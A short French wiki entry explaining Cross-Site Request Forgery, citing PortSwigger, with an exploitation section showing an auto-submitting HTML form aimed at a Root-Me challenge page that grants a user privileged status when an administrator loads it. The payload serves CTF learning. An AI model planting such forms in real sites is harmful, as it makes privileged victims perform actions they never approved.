# [Exploitation/Web] CSRF

## Introduction

La faille **CSRF** pour *Cross- Site Request Forgery* fonctionne presque sur le même principe que XSS mais a pour objectif de faire exécuter à un utilisateur privilégié, une fonction non accessible en temps normal.

## [![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/scaled-1680-/VCximage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-12/VCximage.png)Source

- [Documentation - PortSwigger](https://portswigger.net/web-security/csrf)

## Exploitation

L'objectif est de trouver une page vulnérable à une injection de code que l'administrateur va visiter.

Ensuite, il faut injecter un formulaire malveillant qui sera automatiquement validé lors du chargement de la page :

```html
<form action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST">
    <input type="text" name="username" value="elieroc" />
    <input type="checkbox" name="status" checked />
</form>
<script>
    document.forms[0].submit();
</script>
```